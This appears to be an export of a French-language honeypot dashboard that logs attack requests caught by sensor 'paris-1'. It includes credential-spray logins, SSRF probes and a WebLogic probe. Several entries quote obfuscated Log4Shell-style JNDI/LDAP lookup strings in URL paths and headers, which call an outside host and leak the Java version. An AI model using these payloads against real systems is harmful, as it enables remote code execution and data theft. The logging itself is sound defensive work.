/${${6q:j:gz:-j}${9nd0:belk:wt:-n}${0s:-d}${q1b:hc:45x:-i}${jnd:wb:-:}${d:-l}${o4:a:-d}${9fs:0zb:rbxl:-a}${n5xf:5we3:lf:-p}${9f:-:}${4byo:-/}${32d:ifjc:-/}${4rwg:-P}${ke:y:-A}${qpia:sw:4:-l}${l:-0}${2f:v:-c}${xsfz:x:eu3:--}${${r6:-s}${iq:zn:7qu:-y}${myxw:4hv:-s}${7:5bwr:-:}${c2i:anj9:z:-j}${uvo:s:o:-a}${ay:-v}${f2ws:-a}${6kfi:7i93:j14:-.}${j0v:-v}${lr:e:mj0v:-e}${t:4a7:-r}${4:d3np:av7:-s}${rf:zsx8:h3i:-i}${xb:-o}${3tc:q37k:yvc:-n}}${sh:7:-.}${iz2:yi1:37o:-1}${d:r:dxy:-b}${3aj:2kf:-0}${yq:e7:-d}${9:qy:61:-c}
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3000
Chemin / cible
/${${6q:j:gz:-j}${9nd0:belk:wt:-n}${0s:-d}${q1b:hc:45x:-i}${jnd:wb:-:}${d:-l}${o4:a:-d}${9fs:0zb:rbxl:-a}${n5xf:5we3:lf:-p}${9f:-:}${4byo:-/}${32d:ifjc:-/}${4r…
Service
HTTP
Pourquoi cette classification : Type « deser_php_attack » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 69
Confiance : Confiance 95 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0817
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${6q:j:gz:-j}${9nd0:belk:wt:-n}${0s:-d}${q1b:hc:45x:-i}${jnd:wb:-:}${d:-l}${o4:a:-d}${9fs:0zb:rbxl:-a}${n5xf:5we3:lf:-p}$
Requête brute (extrait)
GET /${${6q:j:gz:-j}${9nd0:belk:wt:-n}${0s:-d}${q1b:hc:45x:-i}${jnd:wb:-:}${d:-l}${o4:a:-d}${9fs:0zb:rbxl:-a}${n5xf:5we3:lf:-p}${9f:-:}${4byo:-/}${32d:ifjc:-/}${4rwg:-P}${ke:y:-A}${qpia:sw:4:-l}${l:-0}${2f:v:-c}${xsfz:x:eu3:--}${${r6:-s}${iq:zn:7qu:-y}${my
|
|||||||
| TCP | 3000 · HTTP | http | Sonde port 3000/TCP port 3000 tcp · via HTTP:3000 · (sonde / probe) | Élevée | Moyen · 60 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${5:w2b4:czo:-j}${x08:a3l7:-n}${zm14:ry3:-d}${y:1:-i}${bj:j58…
Émulateur
HTTP
WAF
23
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/
Preuve honeypot — Sonde port 3000/TCP
Connexion détectée sur le port 3000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_3000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 60
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${5:w2b4:czo:-j}${x08:a3l7:-n}${zm14:ry3:-d}${y:1:-i}${bj:j58:-:}${i:yjx:-l}${dku:-d}${tc6:d8:xtp9:-a}${71:7fmq:-p}${mk6l:-:}${phtl:6nr:-/}${ei6s:v:4esz:-/}${b6t:d8ks:-U}${x:c:9tc:-A}${6:vthz:-l}${…
Règles WAF
rce-0
rce-14
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: 62.3.50.33:3000
Accept: */*
User-Agent: ${${5:w2b4:czo:-j}${x08:a3l7:-n}${zm14:ry3:-d}${y:1:-i}${bj:j58
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:3000 Accept: */* User-Agent: ${${5:w2b4:czo:-j}${x08:a3l7:-n}${zm14:ry3:-d}${y:1:-i}${bj:j58:-:}${i:yjx:-l}${dku:-d}${tc6:d8:xtp9:-a}${71:7fmq:-p}${mk6l:-:}${phtl:6nr:-/}${ei6s:v:4esz:-/}${b6t:d8ks:-U}${x:c:9tc:-A}${6:vt
|
|||||||
| TCP | 3128 · HTTP | http | SSRF interne ssrf internal · via HTTP:3128 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3128
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 3000 · HTTP | http | Sonde port 3000/TCP port 3000 tcp · via HTTP:3000 · (sonde / probe) | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${0:n6f:-j}${r:af7:-n}${87m:pv:h5vw:-d}${bh:2:-i}${nea:bw:h0:…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3000
Chemin / cible
/
Preuve honeypot — Sonde port 3000/TCP
Connexion détectée sur le port 3000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_3000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${0:n6f:-j}${r:af7:-n}${87m:pv:h5vw:-d}${bh:2:-i}${nea:bw:h0:-:}${ldp0:3:71:-l}${2:rs:-d}${ipv:-a}${a4:ckgb:-p}${907:extp:fdv:-:}${fj7x:dt:a36n:-/}${uh46:dxhn:w7im:-/}${o:-U}${h0:-A}${6s9:o:-l}${ai…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: 62.3.50.33:3000
Accept: */*
User-Agent: ${${0:n6f:-j}${r:af7:-n}${87m:pv:h5vw:-d}${bh:2:-i}${nea:bw:h0:-
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:3000 Accept: */* User-Agent: ${${0:n6f:-j}${r:af7:-n}${87m:pv:h5vw:-d}${bh:2:-i}${nea:bw:h0:-:}${ldp0:3:71:-l}${2:rs:-d}${ipv:-a}${a4:ckgb:-p}${907:extp:fdv:-:}${fj7x:dt:a36n:-/}${uh46:dxhn:w7im:-/}${o:-U}${h0:-A}${6s9:o:
|
|||||||
| TCP | 3000 · HTTP | http | Sonde port 3000/TCP port 3000 tcp · via HTTP:3000 · (sonde / probe) | Élevée | Moyen · 62 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
23
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3000
Chemin / cible
/
Preuve honeypot — Sonde port 3000/TCP
Connexion détectée sur le port 3000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_3000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 62
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
rce-14
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:3000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:3000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${7y:ls:xvui:-j}${34:w3ni:lvpq:-n}${46:je:5xd:-d}${wk:
|
|||||||
| TCP | 9002 · HTTP | http | SSRF interne ssrf internal · via HTTP:9002 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9002
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:9002 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:9002 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 7001 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:7001 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
7001
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:7001 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:7001 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Content-Length: 1572 {"username"
|
|||||||
| TCP | 7001 · HTTP | http | Sonde port 7001/TCP port 7001 tcp · via HTTP:7001 · (sonde / probe) · → /${${wv:qg:-j}${s4n:-n}${tkxe:rf:-d}${pmy:c:-i}… | Élevée | Moyen · 62 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
PUT /${${wv:qg:-j}${s4n:-n}${tkxe:rf:-d}${pmy:c:-i}${r9tc:vdy:e:-:}${m:z:y1d:-l}${6jr:-d}${z2j:m:-a}${j… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${wv:qg:-j}${s4n:-n}${tkxe:rf:-d}${pmy:c:-i}${r9tc:vdy:e:-:}${m:z:y1d:-l}${6jr:-d}${z2j:m:-a}${j:x6:j:-p}${tso5:-:}${j0b:kth7:-/}${begd:la4:-/}${18:-P}${r12:-A}${y:3:a:-l}${0b:6y:-0}${2:1t:93k:-c}${xfpu:lnw:--}${${4x0h:qzci:-s}${to6:-y}${no:b8p2:14:-s}${ije:8ayb:-:}${h:be5:-j}${5ven:og0:jpr5:-a}${mf:dn:-v}${aef:ji:h:-a}${bf:ci5k:f:-.}${kuho:-v}${y:-e}${u8:15o8:d7:-r}${31z:pe7:-s}${u:j:v7r4:-i}${hx:v:-o}${i17:-n}}${k5sg:crd:-.}${3l:ft6:oip:-b}${8h6:7:9:-d}${130:k4pq:p:-6}${3he:i6:bi:-a}${digu:z:aj:-6}${xd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
7001
Chemin / cible
/${${wv:qg:-j}${s4n:-n}${tkxe:rf:-d}${pmy:c:-i}${r9tc:vdy:e:-:}${m:z:y1d:-l}${6jr:-d}${z2j:m:-a}${j:x6:j:-p}${tso5:-:}${j0b:kth7:-/}${begd:la4:-/}${18:-P}${r12…
Preuve honeypot — Sonde port 7001/TCP
Connexion détectée sur le port 7001 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_7001_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 62
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${wv:qg:-j}${s4n:-n}${tkxe:rf:-d}${pmy:c:-i}${r9tc:vdy:e:-:}${m:z:y1d:-l}${6jr:-d}${z2j:m:-a}${j:x6:j:-p}${tso5:-:}${j0b:
Requête brute (extrait)
PUT /${${wv:qg:-j}${s4n:-n}${tkxe:rf:-d}${pmy:c:-i}${r9tc:vdy:e:-:}${m:z:y1d:-l}${6jr:-d}${z2j:m:-a}${j:x6:j:-p}${tso5:-:}${j0b:kth7:-/}${begd:la4:-/}${18:-P}${r12:-A}${y:3:a:-l}${0b:6y:-0}${2:1t:93k:-c}${xfpu:lnw:--}${${4x0h:qzci:-s}${to6:-y}${no:b8p2:14:
|
|||||||
| TCP | 7001 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:7001 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
7001
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:7001 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:7001 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2776 Content-Type: application/x-www-form-urlencod |
|||||||
| TCP | 7001 · WEBLOGIC | weblogic | weblogic probe weblogic probe · via WEBLOGIC:7001 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
WEBLOGIC
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
7001
Chemin / cible
—
Service
WEBLOGIC
Payload
ZSDLKFJ2 /${${p:l6:ky:-j}${c:uva:-n}${v:-d}${n:0al:ox6:-i}${iszj:w2:9ok:-:}${4q:jf:-l}${42k:n9:se:-d}${0mgq:iz9:qxjv:-a}${l3:8gk
Pourquoi cette classification : Type « weblogic_probe » (signaux protocolaires) · confiance 77%
Confiance classification
95%
Corrélation +18
Risque capteur
Faible
· 33
Confiance : Confiance 77 % — 2 signal(aux) capteur
Protocole émulé
1
Signaux
Weblogic Console
Upstream
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${p:l6:ky:-j}${c:uva:-n}${v:-d}${n:0al:ox6:-i}${iszj:w2:9ok:-:}${4q:jf:-l}${42k:n9:se:-d}${0mgq:iz9:qxjv:-a}${l3:8gk
Requête brute (extrait)
ZSDLKFJ2 /${${p:l6:ky:-j}${c:uva:-n}${v:-d}${n:0al:ox6:-i}${iszj:w2:9ok:-:}${4q:jf:-l}${42k:n9:se:-d}${0mgq:iz9:qxjv:-a}${l3:8gk:9s4:-p}${2d:bwl:-:}${lp:wgy:2rz:-/}${g:-/}${w:9b5h:su:-P}${cw:67s3:-A}${ct:-l}${k1:ptg1:5pq:-0}${7n:2yo6:-c}${6l97:--}${${qh9:-
|
|||||||
| TCP | 7001 · HTTP | http | Sonde port 7001/TCP port 7001 tcp · via HTTP:7001 · (sonde / probe) · → /${${mr:-j}${uq4f:i:-n}${du:w:-d}${n:-i}${n7:l:… | Élevée | Moyen · 60 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${mr:-j}${uq4f:i:-n}${du:w:-d}${n:-i}${n7:l:-:}${ho:-l}${j089:-d}${0u:chw:-a}${3:gb:-p}${awf1:-:… UA ${${v01k:8y:-j}${9zsh:-n}${a:y:h:-d}${9tf0:-i}${8k:q0:-:}${oi8m…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${mr:-j}${uq4f:i:-n}${du:w:-d}${n:-i}${n7:l:-:}${ho:-l}${j089:-d}${0u:chw:-a}${3:gb:-p}${awf1:-:}${hf7m:u:-/}${dw8:pkdz:-/}${dwsb:69x:-P}${d:-A}${2bn:-l}${3:-0}${8:-c}${3:2ea9:--}${${f9q1:1m2:2:-s}${m5dz:-y}${1:-s}${j:d:-:}${q:-j}${e1:su:a19:-a}${vbgz:08:-v}${8mqx:qp39:i:-a}${bu:0:3:-.}${eqd5:twzf:-v}${q:97du:-e}${s9r:-r}${rw:hm2:kw:-s}${e:as:-i}${ibpw:7b:32:-o}${2pc:8r:-n}}${akn:-.}${7wvq:3ri:-b}${r:-d}${u1:-6}${qt:-a}${g:01a7:i:-6}${bnk:z436:-7}${f7:ah7x:-1}${g1:-e}${yxdk:-d}${pr6:i1bg:-2}${e1:8u:-8}${
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/${${mr:-j}${uq4f:i:-n}${du:w:-d}${n:-i}${n7:l:-:}${ho:-l}${j089:-d}${0u:chw:-a}${3:gb:-p}${awf1:-:}${hf7m:u:-/}${dw8:pkdz:-/}${dwsb:69x:-P}${d:-A}${2bn:-l}${3…
Preuve honeypot — Sonde port 7001/TCP
Connexion détectée sur le port 7001 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_7001_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 60
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${v01k:8y:-j}${9zsh:-n}${a:y:h:-d}${9tf0:-i}${8k:q0:-:}${oi8m:no:qu:-l}${9mi0:ze:n4pl:-d}${4b:-a}${yjhl:h:-p}${ywv:-:}${t:ehq:-/}${61bp:ul:3r4c:-/}${hms:-U}${wzgm:l:-A}${wn95:qk:n:-l}${8:-0}${w:97:…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${mr:-j}${uq4f:i:-n}${du:w:-d}${n:-i}${n7:l:-:}${ho:-l}${j089:-d}${0u:chw:-a}${3:gb:-p}${awf1:-:}${hf7m:u:-/}${dw8:pkdz:-
Requête brute (extrait)
GET /${${mr:-j}${uq4f:i:-n}${du:w:-d}${n:-i}${n7:l:-:}${ho:-l}${j089:-d}${0u:chw:-a}${3:gb:-p}${awf1:-:}${hf7m:u:-/}${dw8:pkdz:-/}${dwsb:69x:-P}${d:-A}${2bn:-l}${3:-0}${8:-c}${3:2ea9:--}${${f9q1:1m2:2:-s}${m5dz:-y}${1:-s}${j:d:-:}${q:-j}${e1:su:a19:-a}${vb
|
|||||||